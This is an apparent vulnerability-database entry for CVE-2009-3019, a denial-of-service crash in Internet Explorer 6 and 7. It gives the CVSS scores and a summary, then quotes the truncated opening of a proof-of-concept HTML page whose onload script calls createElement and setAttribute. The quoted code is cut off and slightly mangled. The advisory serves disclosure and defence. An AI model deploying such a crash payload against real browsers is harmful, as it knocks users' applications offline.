5
CVSSv2

CVE-2009-3019

Published: 31/08/2009 Updated: 19/09/2017
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P

Vulnerability Summary

Microsoft Internet Explorer 6 on Windows XP SP2 and SP3, and Internet Explorer 7 on Vista, allows remote malicious users to cause a denial of service (application crash) via JavaScript code that calls createElement to create an instance of the LI element, and then calls setAttribute to set the value attribute.

Vulnerable Product Search on Vulmon Subscribe to Product

microsoft internet_explorer 6

microsoft internet_explorer 7

Exploits

<html> <head> <title> Irfan Asrar</title> </head> <body onload="c()"> Set Attribute Crash : Tested with IE7 Vista IE6 XP2 IE6 XP3 <script type="text/javascript"> function c() { var li = documentcreateElement("li"); lisetAttribute(" ...